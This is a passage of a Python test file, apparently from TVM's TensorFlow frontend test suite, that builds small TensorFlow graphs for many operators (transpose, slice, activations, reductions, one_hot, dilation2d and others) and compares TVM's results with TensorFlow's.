in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
""" testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_tranapose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
_test_forward_tranapose_axes_input((2, 3, 4), (1, 2, 0))
_test_forward_tranapose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax """
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square """
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp """
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan """
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1 """
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign """
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint """
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg """
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
""" One iteration of dilation2d with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
